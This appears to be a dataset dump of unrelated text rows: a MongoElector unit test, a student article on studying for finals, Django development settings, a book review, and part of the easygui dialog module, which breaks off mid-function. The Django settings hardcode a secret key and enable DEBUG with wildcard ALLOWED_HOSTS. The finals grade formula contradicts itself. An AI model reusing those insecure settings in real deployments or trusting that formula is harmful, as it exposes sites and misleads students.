text
stringlengths
29
850k
#!/usr/bin/env python # -*- coding: utf-8 -*- """ test_mongoelector ---------------------------------- Tests for `mongoelector` module. """ import unittest from time import sleep from pymongo import MongoClient from mongoelector import MongoElector from random import randint class TestMongoelector(unittest.TestCase): """Test Mongoelector Functionality""" def setUp(self): """setup unittests""" db = getattr(MongoClient(), "ml_unittest") db.ml_unittest.electorlocks.drop() def tearDown(self): """teardown unittests""" db = getattr(MongoClient(), "ml_unittest") db.electorlocks.drop() def test_000_init(self): """Smoke test""" db = getattr(MongoClient(), "ml_unittest") MongoElector('test_001_init', db) def test_001_run(self): db = getattr(MongoClient(), "ml_unittest") m1 = MongoElector('test_001_run_' + str(randint(0,10000)), db, ttl=15) m1.start() c = 0 while c < 30 and m1.ismaster is False: c += 1 sleep(1) self.assertTrue(m1.ismaster) self.assertTrue(m1.running) m1.poll() self.assertIsInstance(m1.cluster_detail, dict) m1.stop() m1.poll() c = 0 while c < 30 and m1.ismaster is True: c += 1 sleep(1) self.assertFalse(m1.ismaster) if __name__ == '__main__': import sys sys.exit(unittest.main())
With winter break approaching quickly, students begin to anticipate all the excitement of Christmas; no homework, sleeping in till the afternoon and much more. The only downside is that the obstacle of finals pushes its way into your life and drags you down the path of stress, studying and sleeplessness. “To help me study for finals, I study for 30 minutes then take a 10 min break and just repeat the cycle so my brain gets breaks,” senior Mandy Heutel said. Start by finding out what you need to get on the finals by adding together your first and second quarter grades then multiply the total by two. Depending on what grade you want to achieve, subtract 450 from the total for an A, 400 for B, 350 for C, 300 for D, 250 for F. Example: If I had an 85.09 percent for the first quarter and an 86.63 percent for the second quarter, then I would add them together to get a total for 171.72, then I would multiply the sum by two which would be 343.44. Let’s say I want a B, I would subtract that number from 400. I would need to get a 56% on my final to achieve a B in the class.
""" Django settings for backstage project. Generated by 'django-admin startproject' using Django 1.9.1. For more information on this file, see https://docs.djangoproject.com/en/1.9/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.9/ref/settings/ """ import os from unipath import Path # Build paths inside the project like this: os.path.join(BASE_DIR, ...) # BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) BASE_DIR = Path(__file__).ancestor(3) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '45h_l__1dn&5sr(gb)l*x9j6fw=3okecd10ilotci-95gy1m^o' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = ['*',] # Application definition INSTALLED_APPS = [ 'jet', 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'django_extensions', 'adminsortable2', 'storages', 'rest_framework', 'django_assets', 'imagekit', 'solo', 'ckeditor', 'api', 'facade', 'opere', 'foti', 'scritti', 'frontend', ] MIDDLEWARE_CLASSES = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.auth.middleware.SessionAuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] REST_FRAMEWORK = { # Use Django's standard `django.contrib.auth` permissions, # or allow read-only access for unauthenticated users. 'DEFAULT_PERMISSION_CLASSES': [ 'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly' ] } ROOT_URLCONF = 'urls.base' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'backstage.wsgi.application' # Password validation # https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/1.9/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.9/howto/static-files/ STATIC_URL = '/static/' STATICFILES_FINDERS = ( 'django.contrib.staticfiles.finders.FileSystemFinder', 'django.contrib.staticfiles.finders.AppDirectoriesFinder', ) CKEDITOR_JQUERY_URL = '//ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js' CKEDITOR_UPLOAD_PATH = "uploads/"
All his teachers are sure certain that Evan Galloway can be the graduate who brings glory to small, ordinary St. Sebastian's School. As for Evan, however, he can't be bothered anymore. Since the shock of his young father's suicide last spring, Evan no longer cares about the future. In fact, he believes that he spent the first fifteen years of his life living a lie. Despite his mother's encouragement and the steadfast companionship of his best friend, Alexis, Evan is mired in rage and bitterness. Good memories seem ludicrous when the present holds no hope. Then Evan's grandmother hands him the key--literally, a key--to a locked trunk that his father hid when he was the same age as Evan is now. Digging into the trunk and the small-town secrets it uncovers, Evan can begin to face who his father really was, and why even the love of his son could not save him. In a voice that resonates with the authenticity of grief, Steven Parlato tells a different kind of coming-of-age story, about a boy thrust into adulthood too soon, through the corridor of shame, disbelief, and finally...compassion. Whoa....That's how I felt after reading this book. After you get past the first couple of chapters that start off slow you then begin to question if you want to put the book down, but you keep reading because you have to know the truth. Evan, the main character goes through a lot in the beginning trying to wrap his head around his father's suicide. He's left with a huge hole in his heart and you can feel the grieve he is going through. It wasn't until his grandmother gives him a key to a trunk that held all of his father's secrets is when Evan is struck with the hard truth about his father's past that was kept a secret for so long and why he ended his life. The truth he finds out was shocking and chilling. I won't say because that would be spoiling the book for you, but it is a must read. The journey Evan goes through in uncovering the truth is very graphic and at times uncomfortable to read, but once you go through it, you see at the end that Evan was proud to be named after his father. You see that knowing the truth about his father kind of set both of them free. Disclosure: All opinions are my own. I received The Namesake at no cost for the purpose of this review. No other compensation was received. Online Shopping When Buying A Car?! Chopped All Stars Returns For Season 3! I Took The Pledge with @WSPACanada , Will You?! More Delicious Treats From #Kelloggs!
""" .. moduleauthor:: Stephen Raymond Ferg and Robert Lugg (active) .. default-domain:: py .. highlight:: python Version |release| """ from __future__ import print_function from __future__ import unicode_literals from __future__ import division from __future__ import absolute_import from builtins import zip from builtins import dict from builtins import str from builtins import range from builtins import int from future import standard_library standard_library.install_aliases() from builtins import object import os import string from . import utils as ut from .utils import * from . import state as st # Initialize some global variables that will be reset later __choiceboxMultipleSelect = None __replyButtonText = None __choiceboxResults = None __firstWidget = None __enterboxText = None __enterboxDefaultText = "" __multenterboxText = "" choiceboxChoices = None choiceboxWidget = None entryWidget = None boxRoot = None # ------------------------------------------------------------------- # buttonbox # ------------------------------------------------------------------- def buttonbox(msg="", title=" ", choices=("Button[1]", "Button[2]", "Button[3]"), image=None, root=None, default_choice=None, cancel_choice=None): """ Display a msg, a title, an image, and a set of buttons. The buttons are defined by the members of the choices list. :param str msg: the msg to be displayed :param str title: the window title :param list choices: a list or tuple of the choices to be displayed :param str image: Filename of image to display :param str default_choice: The choice you want highlighted when the gui appears :param str cancel_choice: If the user presses the 'X' close, which button should be pressed :return: the text of the button that the user selected """ global boxRoot, __replyButtonText, buttonsFrame # If default is not specified, select the first button. This matches old # behavior. if default_choice is None: default_choice = choices[0] # Initialize __replyButtonText to the first choice. # This is what will be used if the window is closed by the close button. __replyButtonText = choices[0] if root: root.withdraw() boxRoot = Toplevel(master=root) boxRoot.withdraw() else: boxRoot = Tk() boxRoot.withdraw() boxRoot.title(title) boxRoot.iconname('Dialog') boxRoot.geometry(st.rootWindowPosition) boxRoot.minsize(400, 100) # ------------- define the messageFrame --------------------------------- messageFrame = Frame(master=boxRoot) messageFrame.pack(side=TOP, fill=BOTH) # ------------- define the imageFrame --------------------------------- if image: tk_Image = None try: tk_Image = ut.load_tk_image(image) except Exception as inst: print(inst) if tk_Image: imageFrame = Frame(master=boxRoot) imageFrame.pack(side=TOP, fill=BOTH) label = Label(imageFrame, image=tk_Image) label.image = tk_Image # keep a reference! label.pack(side=TOP, expand=YES, fill=X, padx='1m', pady='1m') # ------------- define the buttonsFrame --------------------------------- buttonsFrame = Frame(master=boxRoot) buttonsFrame.pack(side=TOP, fill=BOTH) # -------------------- place the widgets in the frames ------------------- messageWidget = Message(messageFrame, text=msg, width=400) messageWidget.configure( font=(st.PROPORTIONAL_FONT_FAMILY, st.PROPORTIONAL_FONT_SIZE)) messageWidget.pack(side=TOP, expand=YES, fill=X, padx='3m', pady='3m') __put_buttons_in_buttonframe(choices, default_choice, cancel_choice) # -------------- the action begins ----------- boxRoot.deiconify() boxRoot.mainloop() boxRoot.destroy() if root: root.deiconify() return __replyButtonText def bindArrows(widget): widget.bind("<Down>", tabRight) widget.bind("<Up>", tabLeft) widget.bind("<Right>", tabRight) widget.bind("<Left>", tabLeft) def tabRight(event): boxRoot.event_generate("<Tab>") def tabLeft(event): boxRoot.event_generate("<Shift-Tab>") # ----------------------------------------------------------------------- # __multfillablebox # ----------------------------------------------------------------------- def __multfillablebox(msg="Fill in values for the fields.", title=" ", fields=(), values=(), mask=None): global boxRoot, __multenterboxText, __multenterboxDefaultText, cancelButton, entryWidget, okButton choices = ["OK", "Cancel"] if len(fields) == 0: return None fields = list(fields[:]) # convert possible tuples to a list values = list(values[:]) # convert possible tuples to a list # TODO RL: The following seems incorrect when values>fields. Replace # below with zip? if len(values) == len(fields): pass elif len(values) > len(fields): fields = fields[0:len(values)] else: while len(values) < len(fields): values.append("") boxRoot = Tk() boxRoot.protocol('WM_DELETE_WINDOW', __multenterboxQuit) boxRoot.title(title) boxRoot.iconname('Dialog') boxRoot.geometry(st.rootWindowPosition) boxRoot.bind("<Escape>", __multenterboxCancel) # -------------------- put subframes in the boxRoot -------------------- messageFrame = Frame(master=boxRoot) messageFrame.pack(side=TOP, fill=BOTH) # -------------------- the msg widget ---------------------------- messageWidget = Message(messageFrame, width="4.5i", text=msg) messageWidget.configure( font=(st.PROPORTIONAL_FONT_FAMILY, st.PROPORTIONAL_FONT_SIZE)) messageWidget.pack(side=RIGHT, expand=1, fill=BOTH, padx='3m', pady='3m') global entryWidgets entryWidgets = list() lastWidgetIndex = len(fields) - 1 for widgetIndex in range(len(fields)): argFieldName = fields[widgetIndex] argFieldValue = values[widgetIndex] entryFrame = Frame(master=boxRoot) entryFrame.pack(side=TOP, fill=BOTH) # --------- entryWidget ---------------------------------------------- labelWidget = Label(entryFrame, text=argFieldName) labelWidget.pack(side=LEFT) entryWidget = Entry(entryFrame, width=40, highlightthickness=2) entryWidgets.append(entryWidget) entryWidget.configure( font=(st.PROPORTIONAL_FONT_FAMILY, st.TEXT_ENTRY_FONT_SIZE)) entryWidget.pack(side=RIGHT, padx="3m") bindArrows(entryWidget) entryWidget.bind("<Return>", __multenterboxGetText) entryWidget.bind("<Escape>", __multenterboxCancel) # for the last entryWidget, if this is a multpasswordbox, # show the contents as just asterisks if widgetIndex == lastWidgetIndex: if mask: entryWidgets[widgetIndex].configure(show=mask) # put text into the entryWidget if argFieldValue is None: argFieldValue = '' entryWidgets[widgetIndex].insert(0, '{}'.format(argFieldValue)) widgetIndex += 1 # ------------------ ok button ------------------------------- buttonsFrame = Frame(master=boxRoot) buttonsFrame.pack(side=BOTTOM, fill=BOTH) okButton = Button(buttonsFrame, takefocus=1, text="OK") bindArrows(okButton) okButton.pack( expand=1, side=LEFT, padx='3m', pady='3m', ipadx='2m', ipady='1m') # for the commandButton, bind activation events to the activation event # handler commandButton = okButton handler = __multenterboxGetText for selectionEvent in st.STANDARD_SELECTION_EVENTS: commandButton.bind("<%s>" % selectionEvent, handler) # ------------------ cancel button ------------------------------- cancelButton = Button(buttonsFrame, takefocus=1, text="Cancel") bindArrows(cancelButton) cancelButton.pack( expand=1, side=RIGHT, padx='3m', pady='3m', ipadx='2m', ipady='1m') # for the commandButton, bind activation events to the activation event # handler commandButton = cancelButton handler = __multenterboxCancel for selectionEvent in st.STANDARD_SELECTION_EVENTS: commandButton.bind("<%s>" % selectionEvent, handler) # ------------------- time for action! ----------------- entryWidgets[0].focus_force() # put the focus on the entryWidget boxRoot.mainloop() # run it! # -------- after the run has completed ---------------------------------- boxRoot.destroy() # button_click didn't destroy boxRoot, so we do it now return __multenterboxText # ----------------------------------------------------------------------- # __multenterboxGetText # ----------------------------------------------------------------------- def __multenterboxGetText(event): global __multenterboxText __multenterboxText = list() for entryWidget in entryWidgets: __multenterboxText.append(entryWidget.get()) boxRoot.quit() def __multenterboxCancel(event): global __multenterboxText __multenterboxText = None boxRoot.quit() def __multenterboxQuit(): __multenterboxCancel(None) def __fillablebox(msg, title="", default="", mask=None, image=None, root=None): """ Show a box in which a user can enter some text. You may optionally specify some default text, which will appear in the enterbox when it is displayed. Returns the text that the user entered, or None if he cancels the operation. """ global boxRoot, __enterboxText, __enterboxDefaultText global cancelButton, entryWidget, okButton if title is None: title == "" if default is None: default = "" __enterboxDefaultText = default __enterboxText = __enterboxDefaultText if root: root.withdraw() boxRoot = Toplevel(master=root) boxRoot.withdraw() else: boxRoot = Tk() boxRoot.withdraw() boxRoot.protocol('WM_DELETE_WINDOW', __enterboxQuit) boxRoot.title(title) boxRoot.iconname('Dialog') boxRoot.geometry(st.rootWindowPosition) boxRoot.bind("<Escape>", __enterboxCancel) # ------------- define the messageFrame --------------------------------- messageFrame = Frame(master=boxRoot) messageFrame.pack(side=TOP, fill=BOTH) # ------------- define the imageFrame --------------------------------- try: tk_Image = ut.load_tk_image(image) except Exception as inst: print(inst) tk_Image = None if tk_Image: imageFrame = Frame(master=boxRoot) imageFrame.pack(side=TOP, fill=BOTH) label = Label(imageFrame, image=tk_Image) label.image = tk_Image # keep a reference! label.pack(side=TOP, expand=YES, fill=X, padx='1m', pady='1m') # ------------- define the buttonsFrame --------------------------------- buttonsFrame = Frame(master=boxRoot) buttonsFrame.pack(side=TOP, fill=BOTH) # ------------- define the entryFrame --------------------------------- entryFrame = Frame(master=boxRoot) entryFrame.pack(side=TOP, fill=BOTH) # ------------- define the buttonsFrame --------------------------------- buttonsFrame = Frame(master=boxRoot) buttonsFrame.pack(side=TOP, fill=BOTH) # -------------------- the msg widget ---------------------------- messageWidget = Message(messageFrame, width="4.5i", text=msg) messageWidget.configure( font=(st.PROPORTIONAL_FONT_FAMILY, st.PROPORTIONAL_FONT_SIZE)) messageWidget.pack(side=RIGHT, expand=1, fill=BOTH, padx='3m', pady='3m') # --------- entryWidget ---------------------------------------------- entryWidget = Entry(entryFrame, width=40) bindArrows(entryWidget) entryWidget.configure( font=(st.PROPORTIONAL_FONT_FAMILY, st.TEXT_ENTRY_FONT_SIZE)) if mask: entryWidget.configure(show=mask) entryWidget.pack(side=LEFT, padx="3m") entryWidget.bind("<Return>", __enterboxGetText) entryWidget.bind("<Escape>", __enterboxCancel) # put text into the entryWidget entryWidget.insert(0, __enterboxDefaultText) # ------------------ ok button ------------------------------- okButton = Button(buttonsFrame, takefocus=1, text="OK") bindArrows(okButton) okButton.pack( expand=1, side=LEFT, padx='3m', pady='3m', ipadx='2m', ipady='1m') # for the commandButton, bind activation events to the activation event # handler commandButton = okButton handler = __enterboxGetText for selectionEvent in st.STANDARD_SELECTION_EVENTS: commandButton.bind("<{}>".format(selectionEvent), handler) # ------------------ cancel button ------------------------------- cancelButton = Button(buttonsFrame, takefocus=1, text="Cancel") bindArrows(cancelButton) cancelButton.pack( expand=1, side=RIGHT, padx='3m', pady='3m', ipadx='2m', ipady='1m') # for the commandButton, bind activation events to the activation event # handler commandButton = cancelButton handler = __enterboxCancel for selectionEvent in st.STANDARD_SELECTION_EVENTS: commandButton.bind("<{}>".format(selectionEvent), handler) # ------------------- time for action! ----------------- entryWidget.focus_force() # put the focus on the entryWidget boxRoot.deiconify() boxRoot.mainloop() # run it! # -------- after the run has completed ---------------------------------- if root: root.deiconify() boxRoot.destroy() # button_click didn't destroy boxRoot, so we do it now return __enterboxText def __enterboxGetText(event): global __enterboxText __enterboxText = entryWidget.get() boxRoot.quit() def __enterboxRestore(event): global entryWidget entryWidget.delete(0, len(entryWidget.get())) entryWidget.insert(0, __enterboxDefaultText) def __enterboxCancel(event): global __enterboxText __enterboxText = None boxRoot.quit() def __enterboxQuit(): return __enterboxCancel(None) # ----------------------------------------------------------------------- # __choicebox # ----------------------------------------------------------------------- def __choicebox(msg, title, choices): """ internal routine to support choicebox() and multchoicebox() """ global boxRoot, __choiceboxResults, choiceboxWidget, defaultText global choiceboxWidget, choiceboxChoices # ------------------------------------------------------------------- # If choices is a tuple, we make it a list so we can sort it. # If choices is already a list, we make a new list, so that when # we sort the choices, we don't affect the list object that we # were given. # ------------------------------------------------------------------- choices = list(choices[:]) if len(choices) == 0: choices = ["Program logic error - no choices were specified."] defaultButtons = ["OK", "Cancel"] choices = [str(c) for c in choices] # TODO RL: lines_to_show is set to a min and then set to 20 right after # that. Figure out why. lines_to_show = min(len(choices), 20) lines_to_show = 20 if title is None: title = "" # Initialize __choiceboxResults # This is the value that will be returned if the user clicks the close icon __choiceboxResults = None boxRoot = Tk() # RL: Removed so top-level program can be closed with an 'x' boxRoot.protocol('WM_DELETE_WINDOW', __choiceboxQuit) screen_width = boxRoot.winfo_screenwidth() screen_height = boxRoot.winfo_screenheight() root_width = int((screen_width * 0.8)) root_height = int((screen_height * 0.5)) root_xpos = int((screen_width * 0.1)) root_ypos = int((screen_height * 0.05)) boxRoot.title(title) boxRoot.iconname('Dialog') st.rootWindowPosition = "+0+0" boxRoot.geometry(st.rootWindowPosition) boxRoot.expand = NO boxRoot.minsize(root_width, root_height) st.rootWindowPosition = '+{0}+{1}'.format(root_xpos, root_ypos) boxRoot.geometry(st.rootWindowPosition) # ---------------- put the frames in the window -------------------------- message_and_buttonsFrame = Frame(master=boxRoot) message_and_buttonsFrame.pack(side=TOP, fill=X, expand=NO) messageFrame = Frame(message_and_buttonsFrame) messageFrame.pack(side=LEFT, fill=X, expand=YES) buttonsFrame = Frame(message_and_buttonsFrame) buttonsFrame.pack(side=RIGHT, expand=NO, pady=0) choiceboxFrame = Frame(master=boxRoot) choiceboxFrame.pack(side=BOTTOM, fill=BOTH, expand=YES) # -------------------------- put the widgets in the frames --------------- # ---------- put a msg widget in the msg frame------------------- messageWidget = Message( messageFrame, anchor=NW, text=msg, width=int(root_width * 0.9)) messageWidget.configure( font=(st.PROPORTIONAL_FONT_FAMILY, st.PROPORTIONAL_FONT_SIZE)) messageWidget.pack(side=LEFT, expand=YES, fill=BOTH, padx='1m', pady='1m') # -------- put the choiceboxWidget in the choiceboxFrame ---------------- choiceboxWidget = Listbox(choiceboxFrame, height=lines_to_show, borderwidth="1m", relief="flat", bg="white" ) if __choiceboxMultipleSelect: choiceboxWidget.configure(selectmode=MULTIPLE) choiceboxWidget.configure( font=(st.PROPORTIONAL_FONT_FAMILY, st.PROPORTIONAL_FONT_SIZE)) # add a vertical scrollbar to the frame rightScrollbar = Scrollbar( choiceboxFrame, orient=VERTICAL, command=choiceboxWidget.yview) choiceboxWidget.configure(yscrollcommand=rightScrollbar.set) # add a horizontal scrollbar to the frame bottomScrollbar = Scrollbar( choiceboxFrame, orient=HORIZONTAL, command=choiceboxWidget.xview) choiceboxWidget.configure(xscrollcommand=bottomScrollbar.set) # pack the Listbox and the scrollbars. Note that although we must define # the textArea first, we must pack it last, so that the bottomScrollbar will # be located properly. bottomScrollbar.pack(side=BOTTOM, fill=X) rightScrollbar.pack(side=RIGHT, fill=Y) choiceboxWidget.pack( side=LEFT, padx="1m", pady="1m", expand=YES, fill=BOTH) # --------------------------------------------------- # sort the choices # eliminate duplicates # put the choices into the choicebox Widget # --------------------------------------------------- choices = ut.lower_case_sort(choices) lastInserted = None choiceboxChoices = list() for choice in choices: if choice == lastInserted: continue else: choiceboxWidget.insert(END, choice) choiceboxChoices.append(choice) lastInserted = choice boxRoot.bind('<Any-Key>', KeyboardListener) # put the buttons in the buttonsFrame if len(choices): okButton = Button( buttonsFrame, takefocus=YES, text="OK", height=1, width=6) bindArrows(okButton) okButton.pack( expand=NO, side=TOP, padx='2m', pady='1m', ipady="1m", ipadx="2m") # for the commandButton, bind activation events to the activation event # handler commandButton = okButton handler = __choiceboxGetChoice for selectionEvent in st.STANDARD_SELECTION_EVENTS: commandButton.bind("<%s>" % selectionEvent, handler) # now bind the keyboard events choiceboxWidget.bind("<Return>", __choiceboxGetChoice) choiceboxWidget.bind("<Double-Button-1>", __choiceboxGetChoice) else: # now bind the keyboard events choiceboxWidget.bind("<Return>", __choiceboxCancel) choiceboxWidget.bind("<Double-Button-1>", __choiceboxCancel) cancelButton = Button( buttonsFrame, takefocus=YES, text="Cancel", height=1, width=6) bindArrows(cancelButton) cancelButton.pack( expand=NO, side=BOTTOM, padx='2m', pady='1m', ipady="1m", ipadx="2m") # for the commandButton, bind activation events to the activation event # handler commandButton = cancelButton handler = __choiceboxCancel for selectionEvent in st.STANDARD_SELECTION_EVENTS: commandButton.bind("<%s>" % selectionEvent, handler) # add special buttons for multiple select features if len(choices) and __choiceboxMultipleSelect: selectionButtonsFrame = Frame(messageFrame) selectionButtonsFrame.pack(side=RIGHT, fill=Y, expand=NO) selectAllButton = Button( selectionButtonsFrame, text="Select All", height=1, width=6) bindArrows(selectAllButton) selectAllButton.bind("<Button-1>", __choiceboxSelectAll) selectAllButton.pack( expand=NO, side=TOP, padx='2m', pady='1m', ipady="1m", ipadx="2m") clearAllButton = Button( selectionButtonsFrame, text="Clear All", height=1, width=6) bindArrows(clearAllButton) clearAllButton.bind("<Button-1>", __choiceboxClearAll) clearAllButton.pack( expand=NO, side=TOP, padx='2m', pady='1m', ipady="1m", ipadx="2m") # -------------------- bind some keyboard events ------------------------- boxRoot.bind("<Escape>", __choiceboxCancel) # --------------------- the action begins -------------------------------- # put the focus on the choiceboxWidget, and the select highlight on the # first item choiceboxWidget.select_set(0) choiceboxWidget.focus_force() # --- run it! ----- boxRoot.mainloop() try: boxRoot.destroy() except: pass return __choiceboxResults def __choiceboxGetChoice(event): global boxRoot, __choiceboxResults, choiceboxWidget if __choiceboxMultipleSelect: __choiceboxResults = [ choiceboxWidget.get(index) for index in choiceboxWidget.curselection()] else: choice_index = choiceboxWidget.curselection() __choiceboxResults = choiceboxWidget.get(choice_index) boxRoot.quit() def __choiceboxSelectAll(event): global choiceboxWidget, choiceboxChoices choiceboxWidget.selection_set(0, len(choiceboxChoices) - 1) def __choiceboxClearAll(event): global choiceboxWidget, choiceboxChoices choiceboxWidget.selection_clear(0, len(choiceboxChoices) - 1) def __choiceboxCancel(event): global boxRoot, __choiceboxResults __choiceboxResults = None boxRoot.quit() def __choiceboxQuit(): __choiceboxCancel(None) def KeyboardListener(event): global choiceboxChoices, choiceboxWidget key = event.keysym if len(key) <= 1: if key in string.printable: # Find the key in the list. # before we clear the list, remember the selected member try: start_n = int(choiceboxWidget.curselection()[0]) except IndexError: start_n = -1 # clear the selection. choiceboxWidget.selection_clear(0, 'end') # start from previous selection +1 for n in range(start_n + 1, len(choiceboxChoices)): item = choiceboxChoices[n] if item[0].lower() == key.lower(): choiceboxWidget.selection_set(first=n) choiceboxWidget.see(n) return else: # has not found it so loop from top for n, item in enumerate(choiceboxChoices): if item[0].lower() == key.lower(): choiceboxWidget.selection_set(first=n) choiceboxWidget.see(n) return # nothing matched -- we'll look for the next logical choice for n, item in enumerate(choiceboxChoices): if item[0].lower() > key.lower(): if n > 0: choiceboxWidget.selection_set(first=(n - 1)) else: choiceboxWidget.selection_set(first=0) choiceboxWidget.see(n) return # still no match (nothing was greater than the key) # we set the selection to the first item in the list lastIndex = len(choiceboxChoices) - 1 choiceboxWidget.selection_set(first=lastIndex) choiceboxWidget.see(lastIndex) return # ------------------------------------------------------------------- # diropenbox # ------------------------------------------------------------------- def diropenbox(msg=None, title=None, default=None): """ A dialog to get a directory name. Note that the msg argument, if specified, is ignored. Returns the name of a directory, or None if user chose to cancel. If the "default" argument specifies a directory name, and that directory exists, then the dialog box will start with that directory. :param str msg: the msg to be displayed :param str title: the window title :param str default: starting directory when dialog opens :return: Normalized path selected by user """ title = getFileDialogTitle(msg, title) localRoot = Tk() localRoot.withdraw() if not default: default = None f = ut.tk_FileDialog.askdirectory( parent=localRoot, title=title, initialdir=default, initialfile=None ) localRoot.destroy() if not f: return None return os.path.normpath(f) # ------------------------------------------------------------------- # getFileDialogTitle # ------------------------------------------------------------------- def getFileDialogTitle(msg, title): """ Create nicely-formatted string based on arguments msg and title :param msg: the msg to be displayed :param title: the window title :return: None """ if msg and title: return "%s - %s" % (title, msg) if msg and not title: return str(msg) if title and not msg: return str(title) return None # no message and no title # ------------------------------------------------------------------- # class FileTypeObject for use with fileopenbox # ------------------------------------------------------------------- class FileTypeObject(object): def __init__(self, filemask): if len(filemask) == 0: raise AssertionError('Filetype argument is empty.') self.masks = list() if isinstance(filemask, ut.str): # a str or unicode self.initializeFromString(filemask) elif isinstance(filemask, list): if len(filemask) < 2: raise AssertionError('Invalid filemask.\n' + 'List contains less than 2 members: "{}"'.format(filemask)) else: self.name = filemask[-1] self.masks = list(filemask[:-1]) else: raise AssertionError('Invalid filemask: "{}"'.format(filemask)) def __eq__(self, other): if self.name == other.name: return True return False def add(self, other): for mask in other.masks: if mask in self.masks: pass else: self.masks.append(mask) def toTuple(self): return self.name, tuple(self.masks) def isAll(self): if self.name == "All files": return True return False def initializeFromString(self, filemask): # remove everything except the extension from the filemask self.ext = os.path.splitext(filemask)[1] if self.ext == "": self.ext = ".*" if self.ext == ".": self.ext = ".*" self.name = self.getName() self.masks = ["*" + self.ext] def getName(self): e = self.ext file_types = {".*": "All", ".txt": "Text", ".py": "Python", ".pyc": "Python", ".xls": "Excel"} if e in file_types: return '{} files'.format(file_types[e]) if e.startswith("."): return '{} files'.format(e[1:].upper()) return '{} files'.format(e.upper()) # ------------------------------------------------------------------- # fileopenbox # ------------------------------------------------------------------- def fileopenbox(msg=None, title=None, default='*', filetypes=None, multiple=False): """ A dialog to get a file name. **About the "default" argument** The "default" argument specifies a filepath that (normally) contains one or more wildcards. fileopenbox will display only files that match the default filepath. If omitted, defaults to "\*" (all files in the current directory). WINDOWS EXAMPLE:: ...default="c:/myjunk/*.py" will open in directory c:\\myjunk\\ and show all Python files. WINDOWS EXAMPLE:: ...default="c:/myjunk/test*.py" will open in directory c:\\myjunk\\ and show all Python files whose names begin with "test". Note that on Windows, fileopenbox automatically changes the path separator to the Windows path separator (backslash). **About the "filetypes" argument** If specified, it should contain a list of items, where each item is either: - a string containing a filemask # e.g. "\*.txt" - a list of strings, where all of the strings except the last one are filemasks (each beginning with "\*.", such as "\*.txt" for text files, "\*.py" for Python files, etc.). and the last string contains a filetype description EXAMPLE:: filetypes = ["*.css", ["*.htm", "*.html", "HTML files"] ] .. note:: If the filetypes list does not contain ("All files","*"), it will be added. If the filetypes list does not contain a filemask that includes the extension of the "default" argument, it will be added. For example, if default="\*abc.py" and no filetypes argument was specified, then "\*.py" will automatically be added to the filetypes argument. :param str msg: the msg to be displayed. :param str title: the window title :param str default: filepath with wildcards :param object filetypes: filemasks that a user can choose, e.g. "\*.txt" :param bool multiple: If true, more than one file can be selected :return: the name of a file, or None if user chose to cancel """ localRoot = Tk() localRoot.withdraw() initialbase, initialfile, initialdir, filetypes = fileboxSetup( default, filetypes) # ------------------------------------------------------------ # if initialfile contains no wildcards; we don't want an # initial file. It won't be used anyway. # Also: if initialbase is simply "*", we don't want an # initialfile; it is not doing any useful work. # ------------------------------------------------------------ if (initialfile.find("*") < 0) and (initialfile.find("?") < 0): initialfile = None elif initialbase == "*": initialfile = None func = ut.tk_FileDialog.askopenfilenames if multiple else ut.tk_FileDialog.askopenfilename ret_val = func(parent=localRoot, title=getFileDialogTitle(msg, title), initialdir=initialdir, initialfile=initialfile, filetypes=filetypes ) if multiple: f = [os.path.normpath(x) for x in localRoot.tk.splitlist(ret_val)] else: f = os.path.normpath(ret_val) localRoot.destroy() if not f: return None return f # ------------------------------------------------------------------- # filesavebox # ------------------------------------------------------------------- def filesavebox(msg=None, title=None, default="", filetypes=None): """ A file to get the name of a file to save. Returns the name of a file, or None if user chose to cancel. The "default" argument should contain a filename (i.e. the current name of the file to be saved). It may also be empty, or contain a filemask that includes wildcards. The "filetypes" argument works like the "filetypes" argument to fileopenbox. :param str msg: the msg to be displayed. :param str title: the window title :param str default: default filename to return :param object filetypes: filemasks that a user can choose, e.g. " \*.txt" :return: the name of a file, or None if user chose to cancel """ localRoot = Tk() localRoot.withdraw() initialbase, initialfile, initialdir, filetypes = fileboxSetup( default, filetypes) f = ut.tk_FileDialog.asksaveasfilename(parent=localRoot, title=getFileDialogTitle(msg, title), initialfile=initialfile, initialdir=initialdir, filetypes=filetypes ) localRoot.destroy() if not f: return None return os.path.normpath(f) # ------------------------------------------------------------------- # # fileboxSetup # # ------------------------------------------------------------------- def fileboxSetup(default, filetypes): if not default: default = os.path.join(".", "*") initialdir, initialfile = os.path.split(default) if not initialdir: initialdir = "." if not initialfile: initialfile = "*" initialbase, initialext = os.path.splitext(initialfile) initialFileTypeObject = FileTypeObject(initialfile) allFileTypeObject = FileTypeObject("*") ALL_filetypes_was_specified = False if not filetypes: filetypes = list() filetypeObjects = list() for filemask in filetypes: fto = FileTypeObject(filemask) 